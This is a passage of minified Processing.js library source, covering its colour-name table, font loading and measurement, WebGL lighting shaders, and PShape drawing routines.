520",gray:"#808080",green:"#008000",greenyellow:"#adff2f",honeydew:"#f0fff0",hotpink:"#ff69b4",indianred:"#cd5c5c",indigo:"#4b0082",ivory:"#fffff0",khaki:"#f0e68c",lavender:"#e6e6fa",lavenderblush:"#fff0f5",lawngreen:"#7cfc00",lemonchiffon:"#fffacd",lightblue:"#add8e6",lightcoral:"#f08080",lightcyan:"#e0ffff",lightgoldenrodyellow:"#fafad2",lightgrey:"#d3d3d3",lightgreen:"#90ee90",lightpink:"#ffb6c1",lightsalmon:"#ffa07a",lightseagreen:"#20b2aa",lightskyblue:"#87cefa",lightslategray:"#778899",lightsteelblue:"#b0c4de",lightyellow:"#ffffe0",lime:"#00ff00",limegreen:"#32cd32",linen:"#faf0e6",magenta:"#ff00ff",maroon:"#800000",mediumaquamarine:"#66cdaa",mediumblue:"#0000cd",mediumorchid:"#ba55d3",mediumpurple:"#9370d8",mediumseagreen:"#3cb371",mediumslateblue:"#7b68ee",mediumspringgreen:"#00fa9a",mediumturquoise:"#48d1cc",mediumvioletred:"#c71585",midnightblue:"#191970",mintcream:"#f5fffa",mistyrose:"#ffe4e1",moccasin:"#ffe4b5",navajowhite:"#ffdead",navy:"#000080",oldlace:"#fdf5e6",olive:"#808000",olivedrab:"#6b8e23",orange:"#ffa500",orangered:"#ff4500",orchid:"#da70d6",palegoldenrod:"#eee8aa",palegreen:"#98fb98",paleturquoise:"#afeeee",palevioletred:"#d87093",papayawhip:"#ffefd5",peachpuff:"#ffdab9",peru:"#cd853f",pink:"#ffc0cb",plum:"#dda0dd",powderblue:"#b0e0e6",purple:"#800080",red:"#ff0000",rosybrown:"#bc8f8f",royalblue:"#4169e1",saddlebrown:"#8b4513",salmon:"#fa8072",sandybrown:"#f4a460",seagreen:"#2e8b57",seashell:"#fff5ee",sienna:"#a0522d",silver:"#c0c0c0",skyblue:"#87ceeb",slateblue:"#6a5acd",slategray:"#708090",snow:"#fffafa",springgreen:"#00ff7f",steelblue:"#4682b4",tan:"#d2b48c",teal:"#008080",thistle:"#d8bfd8",tomato:"#ff6347",turquoise:"#40e0d0",violet:"#ee82ee",wheat:"#f5deb3",white:"#ffffff",whitesmoke:"#f5f5f5",yellow:"#ffff00",yellowgreen:"#9acd32"};(function(M){var P=("open() createOutput() createInput() BufferedReader selectFolder() dataPath() createWriter() selectOutput() beginRecord() saveStream() endRecord() selectInput() saveBytes() createReader() beginRaw() endRaw() PrintWriter delay()").split(" "),O=P.length,L,Q;function N(R){return function(){throw"Processing.js does not support "+R+"."}}while(O--){L=P[O];Q=L.replace("()","");M[Q]=N(L)}})(g);g.defineProperty(g,"screenWidth",{get:function(){return B.innerWidth}});g.defineProperty(g,"screenHeight",{get:function(){return B.innerHeight}});var k=[];var H={};var J=function(L){k.splice(H[L],1);delete H[L]};var a=function(L){if(L.externals.canvas.id===r||!L.externals.canvas.id.length){L.externals.canvas.id="__processing"+k.length}H[L.externals.canvas.id]=k.length;k.push(L)};function n(V){var O=250,ac=V.size/O,L=d.createElement("canvas");L.width=2*O;L.height=2*O;L.style.opacity=0;var U=V.getCSSDefinition(O+"px","normal"),W=L.getContext("2d");W.font=U;V.context2d=W;var aa="dbflkhyjqpg";L.width=W.measureText(aa).width;W.font=U;var R=d.createElement("div");R.style.position="absolute";R.style.opacity=0;R.style.fontFamily='"'+V.name+'"';R.style.fontSize=O+"px";R.innerHTML=aa+"<br/>"+aa;d.body.appendChild(R);var S=L.width,Z=L.height,T=Z/2;W.fillStyle="white";W.fillRect(0,0,S,Z);W.fillStyle="black";W.fillText(aa,0,T);var N=W.getImageData(0,0,S,Z).data;var X=0,Q=S*4,Y=N.length;while(++X<Y&&N[X]===255){E()}var P=o.round(X/Q);X=Y-1;while(--X>0&&N[X]===255){E()}var ab=o.round(X/Q);V.ascent=ac*(T-P);V.descent=ac*(ab-T);if(d.defaultView.getComputedStyle){var M=d.defaultView.getComputedStyle(R,null).getPropertyValue("height");M=ac*M.replace("px","");if(M>=V.size*2){V.leading=o.round(M/2)}}d.body.removeChild(R)}function F(L,M){if(L===r){L=""}this.name=L;if(M===r){M=0}this.size=M;this.glyph=false;this.ascent=0;this.descent=0;this.leading=1.2*M;var P=L.indexOf(" Italic Bold");if(P!==-1){L=L.substring(0,P)}this.style="normal";var O=L.indexOf(" Italic");if(O!==-1){L=L.substring(0,O);this.style="italic"}this.weight="normal";var N=L.indexOf(" Bold");if(N!==-1){L=L.substring(0,N);this.weight="bold"}this.family="sans-serif";if(L!==r){switch(L){case"sans-serif":case"serif":case"monospace":case"fantasy":case"cursive":this.family=L;break;default:this.family='"'+L+'", sans-serif';break}}this.context2d=null;n(this);this.css=this.getCSSDefinition();this.context2d.font=this.css}F.prototype.getCSSDefinition=function(N,L){if(N===r){N=this.size+"px"}if(L===r){L=this.leading+"px"}var M=[this.style,"normal",this.weight,N+"/"+L,this.family];return M.join(" ")};F.prototype.measureTextWidth=function(L){return this.context2d.measureText(L).width};F.PFontCache={};F.get=function(N,O){var M=F.PFontCache;var L=N+"/"+O;if(!M[L]){M[L]=new F(N,O)}return M[L]};F.list=function(){return["sans-serif","serif","monospace","fantasy","cursive"]};F.preloading={template:{},initialized:false,initialize:function(){var N=function(){var P="#E3KAI2wAgT1MvMg7Eo3VmNtYX7ABi3CxnbHlm7Abw3kaGVhZ7ACs3OGhoZWE7A53CRobXR47AY3AGbG9jYQ7G03Bm1heH7ABC3CBuYW1l7Ae3AgcG9zd7AI3AE#B3AQ2kgTY18PPPUACwAg3ALSRoo3#yld0xg32QAB77#E777773B#E3C#I#Q77773E#Q7777777772CMAIw7AB77732B#M#Q3wAB#g3B#E#E2BB//82BB////w#B7#gAEg3E77x2B32B#E#Q#MTcBAQ32gAe#M#QQJ#E32M#QQJ#I#g32Q77#";var O=function(Q){return"AAAAAAAA".substr(~~Q?7-Q:6)};return P.replace(/[#237]/g,O)};var L=d.createElement("style");L.setAttribute("type","text/css");L.innerHTML='@font-face {\n font-family: "PjsEmptyFont";\n src: url(\'data:application/x-font-ttf;base64,'+N()+"')\n format('truetype');\n}";d.head.appendChild(L);var M=d.createElement("span");M.style.cssText='position: absolute; top: 0; left: 0; opacity: 0; font-family: "PjsEmptyFont", fantasy;';M.innerHTML="AAAAAAAA";d.body.appendChild(M);this.template=M;this.initialized=true},getElementWidth:function(L){return d.defaultView.getComputedStyle(L,"").getPropertyValue("width")},timeAttempted:0,pending:function(P){if(!this.initialized){this.initialize()}var N,L,O=this.getElementWidth(this.template);for(var M=0;M<this.fontList.length;M++){N=this.fontList[M];L=this.getElementWidth(N);if(this.timeAttempted<4000&&L===O){this.timeAttempted+=P;return true}else{d.body.removeChild(N);this.fontList.splice(M--,1);this.timeAttempted=0}}if(this.fontList.length===0){return false}return true},fontList:[],addedList:{},add:function(L){if(!this.initialized){this.initialize()}var P=typeof L==="object"?L.fontFace:L,O=typeof L==="object"?L.url:L;if(this.addedList[P]){return}var N=d.createElement("style");N.setAttribute("type","text/css");N.innerHTML="@font-face{\n font-family: '"+P+"';\n src: url('"+O+"');\n}\n";d.head.appendChild(N);this.addedList[P]=true;var M=d.createElement("span");M.style.cssText="position: absolute; top: 0; left: 0; opacity: 0;";M.style.fontFamily='"'+P+'", "PjsEmptyFont", fantasy';M.innerHTML="AAAAAAAA";d.body.appendChild(M);this.fontList.push(M)}};g.PFont=F;var D=this.Processing=function(ba,a6){if(!(this instanceof D)){throw"called Processing constructor as if it were a function: missing 'new'."}var ac,cU=ba===r&&a6===r;if(cU){ac=d.createElement("canvas")}else{ac=typeof ba==="string"?d.getElementById(ba):ba}if(!(ac instanceof HTMLCanvasElement)){throw"called Processing constructor without passing canvas element reference or id."}function dt(d7){D.debug("Unimplemented - "+d7)}var cV=this;cV.externals={canvas:ac,context:r,sketch:r};cV.name="Processing.js Instance";cV.use3DContext=false;cV.focused=false;cV.breakShape=false;cV.glyphTable={};cV.pmouseX=0;cV.pmouseY=0;cV.mouseX=0;cV.mouseY=0;cV.mouseButton=0;cV.mouseScroll=0;cV.mouseClicked=r;cV.mouseDragged=r;cV.mouseMoved=r;cV.mousePressed=r;cV.mouseReleased=r;cV.mouseScrolled=r;cV.mouseOver=r;cV.mouseOut=r;cV.touchStart=r;cV.touchEnd=r;cV.touchMove=r;cV.touchCancel=r;cV.key=r;cV.keyCode=r;cV.keyPressed=E;cV.keyReleased=E;cV.keyTyped=E;cV.draw=r;cV.setup=r;cV.__mousePressed=false;cV.__keyPressed=false;cV.__frameRate=60;cV.frameCount=0;cV.width=100;cV.height=100;var d4,cP,dU,bA=true,aF=true,bl=[1,1,1,1],aX=4294967295,ap=true,cd=true,cZ=[0,0,0,1],cu=4278190080,b2=true,dS=1,aw=false,dK=false,aB=true,b3=0,bI=0,cM=3,a4=0,a3=0,a2=0,aY=0,dQ=60,ay=1000/dQ,X="default",cj=ac.style.cursor,dN=20,ci=0,d2=[],aH=0,O=20,cL=false,a0=-3355444,cx=20,bR=255,bG=255,bF=255,bD=255,cY=false,aI=false,dJ=0,d1=0,cX=1,bb=null,bt=null,a1=false,dm=Date.now(),dq=dm,N=0,cD,c2,aN,aJ,bw,cc,S,dz={attributes:{},locations:{}},du,dM,bQ,bd,cI,di,aA,b1,bc,b7,ar,aE,bz,av,ae,c6,bP,cr={width:0,height:0},d0=2,dP=false,cG,aa,P,L=37,c0=0,cH=4,W="Arial",dW=12,aZ=9,dx=2,d3=14,U=F.get(W,dW),ai,cm=null,dR=false,dZ,bY=1000,af=[],dE=null,dT=[16,17,18,20,33,34,35,36,37,38,39,40,144,155,112,113,114,115,116,117,118,119,120,121,122,123,157];var ab,dl,aR,bV;if(d.defaultView&&d.defaultView.getComputedStyle){ab=parseInt(d.defaultView.getComputedStyle(ac,null)["paddingLeft"],10)||0;dl=parseInt(d.defaultView.getComputedStyle(ac,null)["paddingTop"],10)||0;aR=parseInt(d.defaultView.getComputedStyle(ac,null)["borderLeftWidth"],10)||0;bV=parseInt(d.defaultView.getComputedStyle(ac,null)["borderTopWidth"],10)||0}var dH=0;var bJ=0,bK=0,bq=[],bp=[],bo=[],ag=new e(720),bi=new e(720),cE,cz;var bT,cg,dF,aQ,al,c9,Z,da,ao=false,ch=false,cJ=60*(o.PI/180),dj=cV.width/2,dh=cV.height/2,dg=dh/o.tan(cJ/2),aW=dg/10,au=dg*10,b4=cV.width/cV.height;var a7=[],ca=[],c1=0,dL=false,Y=false,dr=true;var Q=0;var bj=[];var df=new e([0.5,0.5,-0.5,0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,0.5,-0.5,0.5,0.5,-0.5,0.5,0.5,0.5,-0.5,0.5,0.5,-0.5,-0.5,0.5,-0.5,-0.5,0.5,0.5,-0.5,0.5,0.5,0.5,0.5,0.5,0.5,-0.5,0.5,0.5,0.5,0.5,-0.5,0.5,0.5,-0.5,0.5,0.5,-0.5,-0.5,0.5,0.5,-0.5,0.5,-0.5,-0.5,0.5,-0.5,0.5,-0.5,-0.5,0.5,-0.5,-0.5,0.5,-0.5,-0.5,-0.5,0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,0.5,-0.5,0.5,0.5,-0.5,0.5,0.5,-0.5,0.5,-0.5,-0.5,-0.5,-0.5,0.5,0.5,0.5,0.5,0.5,-0.5,-0.5,0.5,-0.5,-0.5,0.5,-0.5,-0.5,0.5,0.5,0.5,0.5,0.5]);var bE=new e([0.5,0.5,0.5,0.5,-0.5,0.5,0.5,0.5,-0.5,0.5,-0.5,-0.5,-0.5,0.5,-0.5,-0.5,-0.5,-0.5,-0.5,0.5,0.5,-0.5,-0.5,0.5,0.5,0.5,0.5,0.5,0.5,-0.5,0.5,0.5,-0.5,-0.5,0.5,-0.5,-0.5,0.5,-0.5,-0.5,0.5,0.5,-0.5,0.5,0.5,0.5,0.5,0.5,0.5,-0.5,0.5,0.5,-0.5,-0.5,0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,0.5,-0.5,-0.5,0.5,0.5,-0.5,0.5]);var de=new e([0,0,-1,0,0,-1,0,0,-1,0,0,-1,0,0,-1,0,0,-1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,-1,0,0,-1,0,0,-1,0,0,-1,0,0,-1,0,0,-1,0,-1,0,0,-1,0,0,-1,0,0,-1,0,0,-1,0,0,-1,0,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,0]);var aj=new e([0,0,0,0,1,0,1,1,0,1,0,0]);var ah=new e([0,0,1,0,0,1,0,0,1,0,0,1]);var bS="varying vec4 frontColor;attribute vec3 aVertex;attribute vec4 aColor;uniform mat4 uView;uniform mat4 uProjection;uniform float pointSize;void main(void) { frontColor = aColor; gl_PointSize = pointSize; gl_Position = uProjection * uView * vec4(aVertex, 1.0);}";var bf="#ifdef GL_ES\nprecision highp float;\n#endif\nvarying vec4 frontColor;void main(void){ gl_FragColor = frontColor;}";var ad="varying vec4 frontColor;attribute vec3 Vertex;attribute vec2 aTextureCoord;uniform vec4 color;uniform mat4 model;uniform mat4 view;uniform mat4 projection;uniform float pointSize;varying vec2 vTextureCoord;void main(void) { gl_PointSize = pointSize; frontColor = color; gl_Position = projection * view * model * vec4(Vertex, 1.0); vTextureCoord = aTextureCoord;}";var bX="#ifdef GL_ES\nprecision highp float;\n#endif\nvarying vec4 frontColor;varying vec2 vTextureCoord;uniform sampler2D uSampler;uniform int picktype;void main(void){ if(picktype == 0){ gl_FragColor = frontColor; } else if(picktype == 1){ float alpha = texture2D(uSampler, vTextureCoord).a; gl_FragColor = vec4(frontColor.rgb*alpha, alpha);\n }}";var bx=/Windows/.test(navigator.userAgent);var d5="varying vec4 frontColor;attribute vec3 Vertex;attribute vec3 Normal;attribute vec4 aColor;attribute vec2 aTexture;varying vec2 vTexture;uniform vec4 color;uniform bool usingMat;uniform vec3 specular;uniform vec3 mat_emissive;uniform vec3 mat_ambient;uniform vec3 mat_specular;uniform float shininess;uniform mat4 model;uniform mat4 view;uniform mat4 projection;uniform mat4 normalTransform;uniform int lightCount;uniform vec3 falloff;struct Light { int type; vec3 color; vec3 position; vec3 direction; float angle; vec3 halfVector; float concentration;};uniform Light lights0;uniform Light lights1;uniform Light lights2;uniform Light lights3;uniform Light lights4;uniform Light lights5;uniform Light lights6;uniform Light lights7;Light getLight(int index){ if(index == 0) return lights0; if(index == 1) return lights1; if(index == 2) return lights2; if(index == 3) return lights3; if(index == 4) return lights4; if(index == 5) return lights5; if(index == 6) return lights6; return lights7;}void AmbientLight( inout vec3 totalAmbient, in vec3 ecPos, in Light light ) { float d = length( light.position - ecPos ); float attenuation = 1.0 / ( falloff[0] + ( falloff[1] * d ) + ( falloff[2] * d * d )); totalAmbient += light.color * attenuation;}void DirectionalLight( inout vec3 col, inout vec3 spec, in vec3 vertNormal, in vec3 ecPos, in Light light ) { float powerfactor = 0.0; float nDotVP = max(0.0, dot( vertNormal, normalize(-light.position) )); float nDotVH = max(0.0, dot( vertNormal, normalize(-light.position-normalize(ecPos) ))); if( nDotVP != 0.0 ){ powerfactor = pow( nDotVH, shininess ); } col += light.color * nDotVP; spec += specular * powerfactor;}void PointLight( inout vec3 col, inout vec3 spec, in vec3 vertNormal, in vec3 ecPos, in Light light ) { float powerfactor; vec3 VP = light.position - ecPos; float d = length( VP ); VP = normalize( VP ); float attenuation = 1.0 / ( falloff[0] + ( falloff[1] * d ) + ( falloff[2] * d * d )); float nDotVP = max( 0.0, dot( vertNormal, VP )); vec3 halfVector = normalize( VP - normalize(ecPos) ); float nDotHV = max( 0.0, dot( vertNormal, halfVector )); if( nDotVP == 0.0) { powerfactor = 0.0; } else{ powerfactor = pow( nDotHV, shininess ); } spec += specular * powerfactor * attenuation; col += light.color * nDotVP * attenuation;}void SpotLight( inout vec3 col, inout vec3 spec, in vec3 vertNormal, in vec3 ecPos, in Light light ) { float spotAttenuation; float powerfactor; vec3 VP = light.position - ecPos; vec3 ldir = normalize( -light.direction ); float d = length( VP ); VP = normalize( VP ); float attenuation = 1.0 / ( falloff[0] + ( falloff[1] * d ) + ( falloff[2] * d * d ) ); float spotDot = dot( VP, ldir );"+(bx?" spotAttenuation = 1.0; ":" if( spotDot > cos( light.angle ) ) { spotAttenuation = pow( spotDot, light.concentration ); } else{ spotAttenuation = 0.0; } attenuation *= spotAttenuation;")+" float nDotVP = max( 0.0, dot( vertNormal, VP )); vec3 halfVector = normalize( VP - normalize(ecPos) ); float nDotHV = max( 0.0, dot( vertNormal, halfVector )); if( nDotVP == 0.0 ) { powerfactor = 0.0; } else { powerfactor = pow( nDotHV, shininess ); } spec += specular * powerfactor * attenuation; col += light.color * nDotVP * attenuation;}void main(void) { vec3 finalAmbient = vec3( 0.0, 0.0, 0.0 ); vec3 finalDiffuse = vec3( 0.0, 0.0, 0.0 ); vec3 finalSpecular = vec3( 0.0, 0.0, 0.0 ); vec4 col = color; if(color[0] == -1.0){ col = aColor; } vec3 norm = normalize(vec3( normalTransform * vec4( Normal, 0.0 ) )); vec4 ecPos4 = view * model * vec4(Vertex,1.0); vec3 ecPos = (vec3(ecPos4))/ecPos4.w; if( lightCount == 0 ) { frontColor = col + vec4(mat_specular,1.0); } else { for( int i = 0; i < 8; i++ ) { Light l = getLight(i); if( i >= lightCount ){ break; } if( l.type == 0 ) { AmbientLight( finalAmbient, ecPos, l ); } else if( l.type == 1 ) { DirectionalLight( finalDiffuse, finalSpecular, norm, ecPos, l ); } else if( l.type == 2 ) { PointLight( finalDiffuse, finalSpecular, norm, ecPos, l ); } else { SpotLight( finalDiffuse, finalSpecular, norm, ecPos, l ); } } if( usingMat == false ) { frontColor = vec4( vec3(col) * finalAmbient + vec3(col) * finalDiffuse + vec3(col) * finalSpecular, col[3] ); } else{ frontColor = vec4( mat_emissive + (vec3(col) * mat_ambient * finalAmbient) + (vec3(col) * finalDiffuse) + (mat_specular * finalSpecular), col[3] ); } } vTexture.xy = aTexture.xy; gl_Position = projection * view * model * vec4( Vertex, 1.0 );}";var bH="#ifdef GL_ES\nprecision highp float;\n#endif\nvarying vec4 frontColor;uniform sampler2D sampler;uniform bool usingTexture;varying vec2 vTexture;void main(void){ if(usingTexture){ gl_FragColor = vec4(texture2D(sampler, vTexture.xy)) * frontColor; } else{ gl_FragColor = frontColor; }}";function dY(d9,d8,eb,ea){var d7=dz.locations[d9];if(d7===r){d7=d4.getUniformLocation(d8,eb);dz.locations[d9]=d7}if(d7!==null){if(ea.length===4){d4.uniform4fv(d7,ea)}else{if(ea.length===3){d4.uniform3fv(d7,ea)}else{if(ea.length===2){d4.uniform2fv(d7,ea)}else{d4.uniform1f(d7,ea)}}}}}function dV(d9,d8,eb,ea){var d7=dz.locations[d9];if(d7===r){d7=d4.getUniformLocation(d8,eb);dz.locations[d9]=d7}if(d7!==null){if(ea.length===4){d4.uniform4iv(d7,ea)}else{if(ea.length===3){d4.uniform3iv(d7,ea)}else{if(ea.length===2){d4.uniform2iv(d7,ea)}else{d4.uniform1i(d7,ea)}}}}}function a5(eb,d9,ec,ea,d8){var d7=dz.locations[eb];if(d7===r){d7=d4.getUniformLocation(d9,ec);dz.locations[eb]=d7}if(d7!==-1){if(d8.length===16){d4.uniformMatrix4fv(d7,ea,d8)}else{if(d8.length===9){d4.uniformMatrix3fv(d7,ea,d8)}else{d4.uniformMatrix2fv(d7,ea,d8)}}}}function db(eb,d9,ec,d8,ea){var d7=dz.attributes[eb];if(d7===r){d7=d4.getAttribLocation(d9,ec);dz.attributes[eb]=d7}if(d7!==-1){d4.bindBuffer(d4.ARRAY_BUFFER,ea);d4.vertexAttribPointer(d7,d8,d4.FLOAT,false,0,0);d4.enableVertexAttribArray(d7)}}function cf(d9,d8,ea){var d7=dz.attributes[d9];if(d7===r){d7=d4.getAttribLocation(d8,ea);dz.attributes[d9]=d7}if(d7!==-1){d4.disableVertexAttribArray(d7)}}var bC=function(d9,eb,d8){var ec=d9.createShader(d9.VERTEX_SHADER);d9.shaderSource(ec,eb);d9.compileShader(ec);if(!d9.getShaderParameter(ec,d9.COMPILE_STATUS)){throw d9.getShaderInfoLog(ec)}var ea=d9.createShader(d9.FRAGMENT_SHADER);d9.shaderSource(ea,d8);d9.compileShader(ea);if(!d9.getShaderParameter(ea,d9.COMPILE_STATUS)){throw d9.getShaderInfoLog(ea)}var d7=d9.createProgram();d9.attachShader(d7,ec);d9.attachShader(d7,ea);d9.linkProgram(d7);if(!d9.getProgramParameter(d7,d9.LINK_STATUS)){throw"Error linking shaders."}return d7};var aV=function(d7,eb,d8,ea,d9){return{x:d7,y:eb,w:d8,h:ea}};var bh=aV;var b0=function(d7,eb,d8,ea,d9){return{x:d7,y:eb,w:d9?d8:d8-d7,h:d9?ea:ea-eb}};var aL=function(d7,eb,d8,ea,d9){return{x:d7-d8/2,y:eb-ea/2,w:d8,h:ea}};var dp=function(){};var bO=function(){};var by=function(){};var b9=function(){};bO.prototype=new dp;bO.prototype.constructor=bO;by.prototype=new dp;by.prototype.constructor=by;b9.prototype=new dp;b9.prototype.constructor=b9;dp.prototype.a3DOnlyFunction=E;var ck={};var bN=cV.Character=function(d7){if(typeof d7==="string"&&d7.length===1){this.code=d7.charCodeAt(0)}else{if(typeof d7==="number"){this.code=d7}else{if(d7 instanceof bN){this.code=d7}else{this.code=NaN}}}return ck[this.code]===r?ck[this.code]=this:ck[this.code]};bN.prototype.toString=function(){return String.fromCharCode(this.code)};bN.prototype.valueOf=function(){return this.code};var M=cV.PShape=function(d7){this.family=d7||0;this.visible=true;this.style=true;this.children=[];this.nameTable=[];this.params=[];this.name="";this.image=null;this.matrix=null;this.kind=null;this.close=null;this.width=null;this.height=null;this.parent=null};M.prototype={isVisible:function(){return this.visible},setVisible:function(d7){this.visible=d7},disableStyle:function(){this.style=false;for(var d8=0,d7=this.children.length;d8<d7;d8++){this.children[d8].disableStyle()}},enableStyle:function(){this.style=true;for(var d8=0,d7=this.children.length;d8<d7;d8++){this.children[d8].enableStyle()}},getFamily:function(){return this.family},getWidth:function(){return this.width},getHeight:function(){return this.height},setName:function(d7){this.name=d7},getName:function(){return this.name},draw:function(){if(this.visible){this.pre();this.drawImpl();this.post()}},drawImpl:function(){if(this.family===0){this.drawGroup()}else{if(this.family===1){this.drawPrimitive()}else{if(this.family===3){this.drawGeometry()}else{if(this.family===21){this.drawPath()}}}}},drawPath:function(){var d9,d8;if(this.vertices.length===0){return}cV.beginShape();if(this.vertexCodes.length===0){if(this.vertices[0].length===2){for(d9=0,d8=this.vertices.length;d9<d8;d9++){cV.vertex(this.vertices[d9][0],this.vertices[d9][1])}}else{for(d9=0,d8=this.vertices.length;d9<d8;d9++){cV.vertex(this.vertices[d9][0],this.vertices[d9][1],this.vertices[d9][2])}}}else{var d7=0;if(this.vertices[0].length===2){for(d9=0,d8=this.vertexCodes.length;d9<d8;d9++){if(this.vertexCodes[d9]===0){cV.vertex(this.vertices[d7][0],this.vertices[d7][1]);if(this.vertices[d7]["moveTo"]===true){a7[a7.length-1]["moveTo"]=true}else{if(this.vertices[d7]["moveTo"]===false){a7[a7.length-1]["moveTo"]=false}}cV.breakShape=false;d7++}else{if(this.vertexCodes[d9]===1){cV.bezierVertex(this.vertices[d7+0][0],this.vertices[d7+0][1],this.vertices[d7+1][0],this.vertices[d7+1][1],this.vertices[d7+2][0],this.vertices[d7+2][1]);d7+=3}else{if(this.vertexCodes[d9]===2){cV.curveVertex(this.vertices[d7][0],this.vertices[d7][1]);d7++}else{if(this.vertexCodes[d9]===3){cV.breakShape=true}}}}}}else{for(d9=0,d8=this.vertexCodes.length;d9<d8;d9++){if(this.vertexCodes[d9]===0){cV.vertex(this.vertices[d7][0],this.vertices[d7][1],this.vertices[d7][2]);if(this.vertices[d7]["moveTo"]===true){a7[a7.length-1]["moveTo"]=true}else{if(this.vertices[d7]["moveTo"]===false){a7[a7.length-1]["moveTo"]=false}}cV.breakShape=false}else{if(this.vertexCodes[d9]===1){cV.bezierVertex(this.vertices[d7+0][0],this.vertices[d7+0][1],this.vertices[d7+0][2],this.vertices[d7+1][0],this.vertices[d7+1][1],this.vertices[d7+1][2],this.vertices[d7+2][0],this.vertices[d7+2][1],this.vertices[d7+2][2]);d7+=3}else{if(this.vertexCodes[d9]===2){cV.curveVertex(this.vertices[d7][0],this.vertices[d7][1],this.vertices[d7][2]);d7++}else{if(this.vertexCodes[d9]===3){cV.breakShape=true}}}}}}}cV.endShape(this.close?2:1)},drawGeometry:function(){var d9,d8;cV.beginShape(this.kind);if(this.style){for(d9=0,d8=this.vertices.length;d9<d8;d9++){cV.vertex(this.vertices[d9])}}else{for(d9=0,d8=this.vertices.length;d9<d8;d9++){var d7=this.vertices[d9];if(d7[2]===0){cV.vertex(d7[0],d7[1])}else{cV.vertex(d7[0],d7[1],d7[2])}}}cV.endShape()},drawGroup:function(){for(var d8=0,d7=this.children.length;d8<d7;d8++){this.children[d8].draw()}},drawPrimitive:function(){if(this.kind===2){cV.point(this.params[0],this.params[1])}else{if(this.kind===4){if(this.params.length===4){cV.line(this.params[0],this.params[1],this.params[2],this.params[3])}else{cV.line(this.params[0],this.params[1],this.params[2],this.params[3],this.params[4],this.params[5])}}else{if(this.kind===8){cV.triangle(this.params[0],this.params[1],this.params[2],this.params[3],this.params[4],this.params[5])}else{if(this.kind===16){cV.quad(this.params[0],this.params[1],this.params[2],this.params[3],this.params[4],this.params[5],this.params[6],this.params[7])}else{if(this.kind===30){if(this.image!==null){cV.imageMode(0);cV.image(this.image,this.params[0],this.params[1],this.params[2],this.params[3])}else{cV.rectMode(0);cV.rect(this.params[0],this.params[1],this.params[2],this.params[3])}}else{if(this.kind===31){cV.ellipseMode(0);cV.ellipse(this.params[0],this.params[1],this.params[2],this.params[3])}else{if(this.kind===32){cV.ellipseMode(0);cV.arc(this.params[0],this.params[1],this.params[2],this.params[3],this.params[4],this.params[5])}else{if(this.kind===41){if(this.params.length===1){cV.box(this.params[0])}else{cV.box(this.params[0],this.params[1],this.params[2])}}else{if(this.kind===40){cV.sphere(this.params[0])}}}}}}}}}},pre:function(){if(this.matrix){cV.pushMatrix();d4.transform(this.matrix.elements[0],this.matrix.elements[3],this.matrix.elements[1],this.matrix.elements[4],this.matrix.elements[2],this.matrix.elements[5])}if(this.style){cV.pushStyle();this.styles()}},post:function(){if(this.matrix){cV.popMatrix()}if(this.style){cV.popStyle()}},styles:function(){if(this.stroke){cV.stroke(this.strokeColor);cV.strokeWeight(this.strokeWeight);cV.strokeCap(this.strokeCap);cV.strokeJoin(this.strokeJoin)}else{cV.noStroke()}if(this.fill){cV.fill(this.fillColor)}else{cV.noFill()}},getChild:function(ea){var d8,d7;if(typeof ea==="number"){return this.children[ea]}var d9;if(ea===""||this.name===ea){return this}if(this.nameTable.length>0){for(d8=0,d7=this.nameTable.length;d8<d7||d9;d8++){if(this.nameTable[d8].getName===ea){d9=this.nameTable[d8];break}}if(d9){return d9}}for(d8=0,d7=this.children.length;d8<d7;d8++){d9=this.children[d8].getChild(ea);if(d9){return d9}}return null},getChildCount:function(){return this.children.length},addChild:function(d7){this.children.push(d7);d7.parent=this;if(d7.getName()!==null){this.addName(d7.getName(),d7)}},addName:function(d8,d7){if(this.parent!==null){this.parent.addName(d8,d7)}else{this.nameTable.push([d8,d7])}},translate:function(){if(arguments.length===2){this.checkMatrix(2);this.matrix.translate(arguments[0],arguments[1])}else{this.checkMatrix(3);this.matrix.translate(arguments[0],arguments[1],0)}},checkMatrix:function(d7){if(this.matrix===null){if(d7===2){this.matrix=new cV.PMatrix2D}else{this.matrix=new cV.PMatrix3D}}else{if(d7===3&&this.matrix instanceof cV.PMatrix2D){this.matrix=new cV.PMatrix3D}}},rotateX:function(d7){this.rotate(d7,1,0,0)},rotateY:function(d7){this.rotate(d7,0,1,0)},rotateZ:function(d7){this.rotate(d7,0,0,1)},rotate:function(){if(arguments.length===1){this.checkMatrix(2);this.matrix.rotate(arguments[0])}else{this.checkMatrix(3);this.matrix.rotate(arguments[0],arguments[1],arguments[2],arguments[3])}},scale:function(){if(arguments.length===2){this.checkMatrix(2);this.matrix.scale(arguments[0],arguments[1])}else{if(arguments.length===3){this.checkMatrix(2);this.matrix.scale(arguments[0],arguments[1],arguments[2])}else{this.checkMatrix(2);this.matrix.scale(arguments[0])}}},resetMatrix:function(){this.checkMatrix(2);this.matrix.reset()},applyMatrix:function(d7){if(arguments.length===1){this.applyMatrix(d7.elements[0],d7.elements[1],0,d7.elements[2],d7.elements[3],d7.elements[4],0,d7.elements[5],0,0,1,0,0,0,0,1)}else{if(arguments.length===6){this.checkMatrix(2);this.matrix.apply(arguments[0],arguments[1],arguments[2],0,arguments[3],arguments[4],arguments[5],0,0,0,1,0,0,0,0,1)}else{if(arguments.length===16){this.checkMatrix(3);this.matrix.apply(arguments[0],arguments[1],arguments[2],arguments[3],arguments[4],arguments[5],arguments[6],arguments[7],arguments[8],arguments[9],arguments[10],arguments[11],arguments[12],arguments[13],arguments[14],arguments[15])}}}}};var cq=cV.PShapeSVG=function(){cV.PShape.call(this);if(arguments.length===1){this.element=arguments[0];this.vertexCodes=[];this.vertices=[];this.opacity=1;this.stroke=false;this.strokeColor=4278190080;this.strokeWeight=1;this.strokeCap="butt";this.strokeJoin="miter";this.strokeGradient=null;this.strokeGradientPaint=null;this.strokeName=null;this.strokeOpacity=1;this.fill=true;this.fillColor=4278190080;this.fillGradient=null;this.fillGradientPaint=null;this.fillName=null;this.fillOpacity=1;if(this.element.getName()!=="svg"){throw"root is not <svg>, it's <"+this.element.getName()+">"}}else{if(arguments.length===2){if(typeof 